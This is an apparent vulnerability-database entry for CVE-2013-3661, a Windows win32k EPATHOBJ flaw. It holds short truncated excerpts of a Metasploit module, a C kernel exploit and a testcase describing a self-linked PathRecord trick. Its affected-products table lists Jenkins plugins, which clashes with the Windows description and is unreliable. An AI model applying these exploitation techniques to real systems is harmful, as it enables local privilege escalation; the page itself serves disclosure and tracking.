CVE-2013-3661
Published 2013-05-24
Priority: P4 28 · Severity: medium · CVSS 2.0 base score: 4.9
CVSS 2.0 vector: AV:L/AC:L/Au:N/C:N/I:N/A:C
Exploit available
EPSS: 3.85% (88.8th percentile)
The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain.
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | certain_pages_in_monitoring_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | monitoring_plugin | — | — |
| jenkins | user_of_monitoring_plugin | — | — |
| microsoft | windows_server_2008 | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)
exploitdb · 2013-07-02
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
  # (the excerpt omits the lines between the class declaration and the info hash)
      'Name'        => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
      'Description' => %q{
        This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
        of uninitialized data which allows to corrupt memory. At the moment, the module has
        been tested successfully on Windows XP SP3, Windows 2003 SP1, a
```
Exploit-DB
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
exploitdb · 2013-06-03
---
```c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include
#include
#include
#include
#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")

#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty ob
```
Exploit-DB
Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
exploitdb · 2013-05-21
---
I'm quite proud of this list cycle trick; here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

```
.text:BFA122B8  call    newpathrec        ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD  cmp     eax, 1            ; Check for failure
.text:BFA122C0  jz      short continue
.text:BFA122C2  xor     eax, eax          ; Exit early
.text:BFA122C4  jmp     early_exit
```

So we create a list node like this:

```c
PathRecord->Next  = PathRecord;
PathRecord->Flags = 0;
```

Then EPATHOBJ::bFlatten() spins forever doing nothing:

```c
BOOL __thiscall EP
```
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/fulldisclosure/2013-05/0094.html
http://archives.neohapsis.com/archives/fulldisclosure/2013-06/0006.html
http://secunia.com/advisories/53435
http://twitter.com/taviso/statuses/335557286657400832
http://www.computerworld.com/s/article/9239477
http://www.exploit-db.com/exploits/25611/
http://www.osvdb.org/93539
http://www.reddit.com/r/netsec/comments/1eqh66/0day_windows_kernel_epathobj_vulnerability/
http://www.theverge.com/2013/5/23/4358400/google-engineer-bashes-microsoft-discloses-windows-flaw